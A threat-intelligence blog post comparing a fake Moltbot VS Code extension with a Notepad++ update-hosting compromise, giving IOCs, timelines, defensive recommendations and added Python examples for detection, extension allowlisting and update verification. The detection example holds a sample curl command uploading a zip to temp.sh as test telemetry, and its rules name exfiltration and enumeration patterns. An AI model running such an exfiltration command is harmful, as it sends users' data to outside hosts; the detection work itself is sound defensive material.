  • Writer: Patrick Duggan
  • Feb 2
  • 6 min read

# Supply Chain Showdown: Moltbot vs Notepad++ - Two Attacks, One Lesson


**Published:** February 2, 2026

**Author:** DugganUSA Threat Intelligence


## TL;DR



Two supply chain attacks hit developer tools in the past week. One was loud and fast (Moltbot fake VS Code extension). One was quiet and slow (Notepad++ hosting provider compromise by Chinese state actors). Same target: developers. Same goal: access. Completely different tradecraft. Here's what both teach us about software trust in 2026.




## The Tale of Two Attacks

| Factor | Moltbot (Jan 27, 2026) | Notepad++ (June-Dec 2025) |
|--------|------------------------|---------------------------|
| **Vector** | Fake VS Code extension | Hosting provider hijack |
| **Actor** | Unknown | APT31/Violet Typhoon (China) |
| **Duration** | ~24 hours | **6 months** |
| **Targeting** | Mass (all installers) | Selective (East Asia telecom/finance) |
| **Payload** | ConnectWise ScreenConnect RAT | Custom recon + exfil |
| **Detection** | Fast (Aikido flagged it) | Slow (community user noticed) |
| **Sophistication** | Medium | High |




## Attack #1: Moltbot (The Smash and Grab)

### What Happened



January 27, 2026: A fake extension called "ClawdBot Agent – AI Coding Assistant" appeared on the VS Code Marketplace. It worked as advertised—a functional AI coding assistant. It also dropped ConnectWise ScreenConnect the moment VS Code launched.


### How It Worked

### Why It Worked



1. **Moltbot doesn't have an official extension** - attackers exploited brand recognition

2. **VS Code Marketplace vetting is weak** - extension published same day

3. **Functional camouflage** - the AI assistant actually worked

4. **Developer trust** - "It's on the official marketplace"


### IOCs

| Type | Indicator |
|------|-----------|
| Extension ID | `clawdbot.clawdbot-agent` |
| Process | `ScreenConnect.ClientService` |
| File | `~/.clawdbot/*` (credential storage) |
| Publisher | "clawdbot" (impersonator) |


### Outcome

Detected within 24 hours. Microsoft removed it. Moltbot issued an advisory. Damage: unknown, but likely limited thanks to the fast response.




## Attack #2: Notepad++ (The Long Game)

### What Happened



June 2025: Chinese state actors (APT31/Violet Typhoon) compromised Notepad++'s hosting provider. For six months, they intercepted update traffic and redirected selected users to malicious servers delivering trojanized installers.


### How It Worked

### Why It Worked



1. **Infrastructure-level access** - no code vulnerability needed

2. **Legitimate domain** - updates came from notepad-plus-plus.org

3. **No signature verification** - pre-8.8.9 didn't validate installers

4. **Selective targeting** - only East Asia, avoided mass detection

5. **Six months of patience** - state-sponsored discipline


### IOCs (Limited)

| Type | Indicator |
|------|-----------|
| File | `AutoUpdater.exe` in %TEMP% |
| File | `update.exe` in %TEMP% |
| Behavior | System enumeration commands |
| Exfil | curl upload to `temp.sh` |
| Process | `GUP.exe` spawning unexpected children |
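The two IOC tables above (Moltbot and Notepad++) translate directly into process, file and command-line rules. The following is an added example written for this page, not code from the original post or the DugganUSA platform: it runs those rules over a handful of constructed, Sysmon-style telemetry events. The pattern describing what a healthy `GUP.exe` run is allowed to spawn (the editor itself or an `npp.*Installer*.exe`) is an assumption about a normal Notepad++ update, and the list of enumeration binaries is a common set rather than one the post names.

```python
"""Detection logic for the process, file and network IOCs in the two tables
above (Moltbot and Notepad++).

Added example, not code from the original post or the DugganUSA platform.
Events are simplified Sysmon-style dicts; the sample events at the bottom are
constructed, and the pattern for children GUP.exe is expected to spawn during a
normal Notepad++ update is an assumption.
"""
import re
from dataclasses import dataclass

# Children a healthy GUP.exe run should produce (assumption, see docstring).
EXPECTED_GUP_CHILDREN = re.compile(r"^(notepad\+\+\.exe|npp\..*installer.*\.exe)$")
# Files the Notepad++ intrusion dropped into %TEMP% (from the IOC table).
DROPPED_UPDATER_NAMES = {"autoupdater.exe", "update.exe"}
# Updater-like parents from which enumeration should never originate.
UPDATER_IMAGES = {"gup.exe"} | DROPPED_UPDATER_NAMES
# Common host/domain enumeration binaries (the post names the behaviour, not the list).
ENUM_COMMANDS = {"whoami.exe", "systeminfo.exe", "ipconfig.exe", "tasklist.exe", "net.exe", "nltest.exe"}
EXFIL_HOSTS = ("temp.sh",)


@dataclass
class Finding:
    rule: str
    event_id: int
    detail: str


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def _in_temp(path: str) -> bool:
    return "/temp/" in path.replace("\\", "/").lower()


def evaluate(events: list[dict]) -> list[Finding]:
    """Run every rule over every event; a single event may trip several rules."""
    findings: list[Finding] = []
    for ev in events:
        if ev["type"] == "process":
            img = _basename(ev["image"])
            parent = _basename(ev.get("parent_image", ""))
            cmd = ev.get("command_line", "").lower()
            # Moltbot: a ScreenConnect client service appearing on a dev workstation.
            if img.startswith("screenconnect.clientservice"):
                findings.append(Finding("moltbot_screenconnect", ev["id"], f"{parent} -> {img}"))
            # Notepad++: GUP.exe spawning anything but the editor or an installer.
            if parent == "gup.exe" and not EXPECTED_GUP_CHILDREN.match(img):
                findings.append(Finding("npp_gup_unexpected_child", ev["id"], f"{parent} -> {img}"))
            # Notepad++: enumeration commands launched by an updater process.
            if parent in UPDATER_IMAGES and img in ENUM_COMMANDS:
                findings.append(Finding("npp_updater_enumeration", ev["id"], f"{parent} -> {img}"))
            # Notepad++: curl upload to temp.sh.
            if img == "curl.exe" and any(h in cmd for h in EXFIL_HOSTS):
                findings.append(Finding("npp_exfil_tempsh", ev["id"], cmd))
        elif ev["type"] == "file":
            # Notepad++: AutoUpdater.exe / update.exe written into %TEMP%.
            if _basename(ev["path"]) in DROPPED_UPDATER_NAMES and _in_temp(ev["path"]):
                findings.append(Finding("npp_dropped_updater", ev["id"], ev["path"]))
    return findings


# Constructed sample telemetry: one benign update, then one event per attack pattern.
SAMPLE_EVENTS = [
    {"id": 1, "type": "process", "parent_image": r"C:\Program Files\Notepad++\updater\GUP.exe",
     "image": r"C:\Program Files\Notepad++\notepad++.exe"},
    {"id": 2, "type": "process", "parent_image": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "image": r"C:\Users\dev\AppData\Local\Temp\ScreenConnect.ClientService.exe"},
    {"id": 3, "type": "file", "path": r"C:\Users\dev\AppData\Local\Temp\AutoUpdater.exe"},
    {"id": 4, "type": "process", "parent_image": r"C:\Program Files\Notepad++\updater\GUP.exe",
     "image": r"C:\Users\dev\AppData\Local\Temp\update.exe"},
    {"id": 5, "type": "process", "parent_image": r"C:\Users\dev\AppData\Local\Temp\update.exe",
     "image": r"C:\Windows\System32\whoami.exe", "command_line": "whoami /all"},
    {"id": 6, "type": "process", "parent_image": r"C:\Users\dev\AppData\Local\Temp\update.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "command_line": "curl.exe --upload-file h.zip https://temp.sh/"},
    {"id": 7, "type": "process", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\curl.exe", "command_line": "curl.exe https://example.com"},
]


def run_sample() -> list[Finding]:
    return evaluate(SAMPLE_EVENTS)


if __name__ == "__main__":
    for f in run_sample():
        print(f"[{f.rule}] event {f.event_id}: {f.detail}")
```

Event 1 (GUP.exe launching notepad++.exe) and event 7 (a user-driven curl to an unrelated host) produce nothing; the other five each trip exactly one rule. In a real pipeline the `GUP.exe` child pattern is the rule most worth tuning, because a legitimate update also spawns the installer and a too-narrow pattern will page on every release.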


### Outcome

Discovered by a community user who noticed GUP.exe behaving strangely. Notepad++ migrated hosting and added signature verification in v8.8.9. Damage: unknown; targeted organizations were likely compromised for months.




## The Sophistication Gap

### Moltbot: Script Kiddie Tactics



- **Spray and pray**: Target everyone, hope someone installs

- **Known RAT**: ScreenConnect is well-documented

- **Fast and loud**: High visibility, fast detection

- **No persistence planning**: One-shot payload


### Notepad++: State-Sponsored Tradecraft



- **Surgical targeting**: Only specific organizations in specific regions

- **Infrastructure compromise**: Attack the supply chain, not the code

- **Custom tooling**: Bespoke recon, not off-the-shelf RAT

- **Long-term access**: Six months of maintained presence

- **Clean exit**: Credentials retained even after server remediation




## Detection Comparison

### Moltbot Was Caught Because:



1. Aikido's automated scanning flagged network permissions

2. Extension requested capabilities inconsistent with stated purpose

3. ScreenConnect is a known RAT - signatures exist

4. Mass distribution = higher chance of hitting a researcher


### Notepad++ Wasn't Caught For 6 Months Because:



1. Infrastructure attack left no code artifacts

2. Selective targeting avoided security researchers

3. Updates came from legitimate domain

4. Custom tooling had no existing signatures

5. Patience - low and slow avoids anomaly detection




## What Developers Should Learn

### Trust Nothing

| Old Assumption | New Reality |
|----------------|-------------|
| "It's on the official marketplace" | Marketplaces don't vet thoroughly |
| "It's from the official domain" | Domains can be hijacked at hosting level |
| "I use automatic updates" | Updates can be poisoned |
| "I'd notice malware" | Good malware works while you work |


### Defense Layers



**For Extension-Based Attacks (Moltbot-style):**

- Verify publisher identity before installing

- Check extension permissions vs. stated functionality

- Use allowlists for approved extensions

- Monitor for unexpected processes
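The first three extension-side controls (verify the publisher, check the extension against what it claims to be, allowlist) can be enforced from the output of the VS Code CLI. Below is an added example, not code from the original post: it parses what `code --list-extensions --show-versions` prints (one `publisher.name@version` per line) and sorts each installed extension into allowed, unknown, brand-impersonation (the post's point that Moltbot has no official extension) or publisher-mismatch (a vetted extension name under a different publisher). The listing, the allowlist and the extension ids other than `clawdbot.clawdbot-agent` are constructed for the example.

```python
"""Audit installed VS Code extensions against an organisational allowlist.

Added example, not code from the original post. Input is the text that
`code --list-extensions --show-versions` prints (one "publisher.name@version"
per line). The listing and allowlist below are constructed; the brand rule
encodes the post's statement that Moltbot has no official extension.
"""
import re
from dataclasses import dataclass, field

LINE = re.compile(r"^(?P<publisher>[^.@\s]+)\.(?P<name>[^@\s]+)(?:@(?P<version>\S+))?$")

# Constructed allowlist: extension ids (publisher.name) the organisation vetted.
ALLOWLIST = {"ms-python.python", "dbaeumer.vscode-eslint", "esbenp.prettier-vscode"}

# Brands the post says have no official extension; anything using the name is suspect.
UNOFFICIAL_BRANDS = ("moltbot", "clawdbot")


@dataclass
class AuditResult:
    allowed: list[str] = field(default_factory=list)
    impersonation: list[str] = field(default_factory=list)      # trades on a brand with no official extension
    publisher_mismatch: list[str] = field(default_factory=list)  # vetted name, different publisher
    unknown: list[str] = field(default_factory=list)
    unparsed: list[str] = field(default_factory=list)

    def to_remove(self) -> list[str]:
        return self.impersonation + self.publisher_mismatch + self.unknown


def audit(listing: str, allowlist: set[str] = ALLOWLIST) -> AuditResult:
    result = AuditResult()
    # Map the name half of each vetted id back to the full id to spot publisher swaps.
    vetted_names = {ext.split(".", 1)[1]: ext for ext in allowlist}
    for raw in listing.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = LINE.match(line)
        if not m:
            result.unparsed.append(line)
            continue
        publisher, name = m["publisher"].lower(), m["name"].lower()
        ext_id = f"{publisher}.{name}"
        if any(brand in ext_id for brand in UNOFFICIAL_BRANDS):
            result.impersonation.append(ext_id)
        elif ext_id in allowlist:
            result.allowed.append(ext_id)
        elif name in vetted_names:
            result.publisher_mismatch.append(ext_id)
        else:
            result.unknown.append(ext_id)
    return result


def remediation_commands(result: AuditResult) -> list[str]:
    """Build the removal commands; --uninstall-extension is the CLI's real flag."""
    return [f"code --uninstall-extension {ext}" for ext in result.to_remove()]


# Constructed listing in the CLI's output format.
SAMPLE_LISTING = """\
ms-python.python@2024.4.1
dbaeumer.vscode-eslint@2.4.4
clawdbot.clawdbot-agent@1.0.0
someone.python@0.0.1
unknown-pub.cool-theme@3.1.0
"""

if __name__ == "__main__":
    res = audit(SAMPLE_LISTING)
    print("allowed:", res.allowed)
    print("impersonation:", res.impersonation)
    print("publisher mismatch:", res.publisher_mismatch)
    print("unknown:", res.unknown)
    for cmd in remediation_commands(res):
        print(cmd)
```

On a fleet the listing comes from each workstation's `code --list-extensions --show-versions`, and the allowlist lives in version control so that adding an extension is a reviewed change rather than a click in the marketplace.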


**For Infrastructure Attacks (Notepad++-style):**

- Verify signatures on all updates (Notepad++ v8.8.9+)

- Use package managers with cryptographic verification

- Monitor for unexpected network connections from trusted apps

- Watch for enumeration commands from update processes
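The infrastructure-side lesson is that a legitimate domain proves nothing about the bytes it serves, which is why the Notepad++ timeline has two separate hardening steps (restricting update sources in v8.8.8, then verifying installers in v8.8.9). The following is an added example written for this page, not Notepad++'s updater code: it models those two steps as a client-side acceptance policy and runs the same inputs through the old and new behaviour. Verification is a SHA-256 digest pinned from an out-of-band manifest, a stdlib-only stand-in; a real installer should additionally carry a publisher signature (Authenticode on Windows). Host names and installer bytes are constructed.

```python
"""Update-acceptance policy: approved sources plus cryptographic verification.

Added example, not Notepad++'s updater code. It models, as a client-side
download policy, the two hardening steps in the post's timeline (v8.8.8
restricting update sources, v8.8.9 requiring verification). Verification here
is a SHA-256 digest pinned from an out-of-band manifest, standing in for the
publisher signature a real installer should carry. Host names and installer
bytes below are constructed.
"""
import hashlib
import hmac
from urllib.parse import urlparse

ALLOWED_UPDATE_HOSTS = {"updates.example.org"}   # constructed approved-source list


def legacy_accept(url: str, blob: bytes) -> tuple[bool, str]:
    """Pre-hardening behaviour: anything the updater downloaded gets executed."""
    return True, "accepted without any verification"


def hardened_accept(url: str, blob: bytes, manifest_sha256: str,
                    allowed_hosts: set[str] = ALLOWED_UPDATE_HOSTS) -> tuple[bool, str]:
    """Transport, then source, then content; the first failing check rejects."""
    parts = urlparse(url)
    if parts.scheme != "https":
        return False, "rejected: plaintext transport"
    if parts.hostname not in allowed_hosts:
        return False, f"rejected: {parts.hostname!r} is not an approved update source"
    actual = hashlib.sha256(blob).hexdigest()
    # Constant-time compare is cheap here and avoids a leaky comparison habit.
    if not hmac.compare_digest(actual, manifest_sha256.lower()):
        return False, "rejected: installer digest does not match manifest"
    return True, "accepted: source approved and digest verified"


# Constructed installer bytes and a tampered copy of the kind a hijacked host would serve.
GENUINE_INSTALLER = b"constructed genuine installer bytes"
TAMPERED_INSTALLER = GENUINE_INSTALLER + b"\x00constructed appended payload"
MANIFEST_SHA256 = hashlib.sha256(GENUINE_INSTALLER).hexdigest()  # pinned out of band


def scenarios() -> dict[str, tuple[bool, str]]:
    """Same inputs through the old and the new policy."""
    approved = "https://updates.example.org/npp.installer.exe"
    return {
        "legacy_tampered_from_real_host": legacy_accept(approved, TAMPERED_INSTALLER),
        "hardened_genuine_from_real_host": hardened_accept(approved, GENUINE_INSTALLER, MANIFEST_SHA256),
        # The post's key point: the domain is legitimate, only the content check catches this.
        "hardened_tampered_from_real_host": hardened_accept(approved, TAMPERED_INSTALLER, MANIFEST_SHA256),
        "hardened_genuine_from_unknown_host": hardened_accept(
            "https://mirror.example.net/npp.installer.exe", GENUINE_INSTALLER, MANIFEST_SHA256),
        "hardened_genuine_over_http": hardened_accept(
            "http://updates.example.org/npp.installer.exe", GENUINE_INSTALLER, MANIFEST_SHA256),
    }


if __name__ == "__main__":
    for name, (ok, reason) in scenarios().items():
        print(f"{name}: {'ACCEPT' if ok else 'REJECT'} ({reason})")
```

The `hardened_tampered_from_real_host` case is the Notepad++ situation: the source check passes because the host is the real one, and only the content check rejects. A pinned digest is only as trustworthy as the channel it came from; if the manifest is fetched from the same compromised host, an attacker simply updates both, which is why a signature under a key that never touches the hosting provider is the control the post calls table stakes.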




## The Bigger Picture



These attacks represent two ends of the supply chain spectrum:


**Moltbot** = Opportunistic, fast, loud, easy to catch

**Notepad++** = Targeted, slow, quiet, hard to catch


Both succeeded initially because developers trust their tools.


The Moltbot attacker wanted quick access to many machines. The APT31 operators wanted deep access to specific machines. Both got what they wanted, at least temporarily.




## Our Detection Posture

### Pattern 43: Supply Chain via Developer Tools

We track both attack patterns:

| Control | Moltbot-style | Notepad++-style |
|---------|---------------|-----------------|
| Extension vetting | Allowlist-only | N/A |
| Update verification | N/A | Signature required |
| Process monitoring | ScreenConnect detection | Unexpected child processes |
| Network monitoring | RAT C2 patterns | Exfil to temp.sh/similar |
| Credential protection | No cleartext storage | Key Vault integration |


### Why We Use Claude Code

| Risk | Claude Code | Moltbot | Notepad++ |
|------|-------------|---------|-----------|
| Extension ecosystem | Anthropic-controlled | Unvetted MoltHub | N/A |
| Update mechanism | Anthropic-signed | N/A | Was unsigned |
| Credential storage | Encrypted keychain | Cleartext ~/.clawdbot | N/A |
| Admin interface | None exposed | Often exposed | N/A |




## Timeline Comparison

### Moltbot

| Date | Event |
|------|-------|
| Jan 27, 2026 | Malicious extension published |
| Jan 27, 2026 | Aikido detection |
| Jan 28, 2026 | Microsoft removes extension |
| Jan 28, 2026 | Public disclosure |


**Total exposure: ~24 hours**


### Notepad++

| Date | Event |
|------|-------|
| June 2025 | Hosting provider compromised |
| June-Sept 2025 | Active server access |
| Sept 2, 2025 | Server access lost (kernel update) |
| Sept-Dec 2025 | Credential-based access continues |
| Nov 2025 | Community user notices anomaly |
| Nov 18, 2025 | v8.8.8 restricts update sources |
| Dec 2, 2025 | Credential access terminated |
| Dec 9, 2025 | v8.8.9 adds signature verification |
| Feb 2, 2026 | Full public disclosure |


**Total exposure: ~6 months**




## Key Takeaways



1. **Supply chain attacks are the new normal** - two major attacks in one week

2. **Sophistication varies wildly** - from script kiddie to state-sponsored

3. **Detection time matters** - 24 hours vs 6 months

4. **Signature verification is table stakes** - Notepad++ learned this the hard way

5. **Developer tools are high-value targets** - access to devs = access to everything they build

6. **Trust must be verified** - official marketplace ≠ safe, official domain ≠ safe




## Recommendations

### For Individual Developers



- [ ] Update Notepad++ to v8.8.9+

- [ ] Audit VS Code extensions against allowlist

- [ ] Enable extension auto-update verification where available

- [ ] Monitor for unexpected processes from dev tools

- [ ] Don't store credentials in cleartext


### For Organizations



- [ ] Implement extension allowlists

- [ ] Require signed updates for all developer tools

- [ ] Monitor developer workstations for RAT indicators

- [ ] Include supply chain in threat modeling

- [ ] Assume your developers are targeted




## Platform Stats

| Metric | Value |
|--------|-------|
| IOCs Tracked | 272,310 |
| Automated Decisions | 294,716 |
| Supply Chain Patterns | 43+ documented |
| Developer Tool Attacks (2026) | 2 major (so far) |




*This analysis was performed using the DugganUSA Threat Intelligence Platform. We track supply chain attacks because developers are the keys to the kingdom.*


**Sources:**

- [The Hacker News - Notepad++ Supply Chain](https://thehackernews.com/2026/02/notepad-official-update-mechanism.html)

- [Help Net Security - Notepad++ Compromise](https://www.helpnetsecurity.com/2026/02/02/2025-notepad-supply-chain-compromise/)

- [The Hacker News - Moltbot VS Code](https://thehackernews.com/2026/01/fake-moltbot-ai-coding-assistant-on-vs.html)

- [Aikido - Clawdbot Extension Analysis](https://www.aikido.dev/blog/fake-clawdbot-vscode-extension-malware)

- [Hackread - Notepad++ Hosting Breach](https://hackread.com/notepad-updates-malware-hosting-breach/)





*Her name was Renee Nicole Good.*


*His name was Alex Jeffery Pretti.*

 
 
 
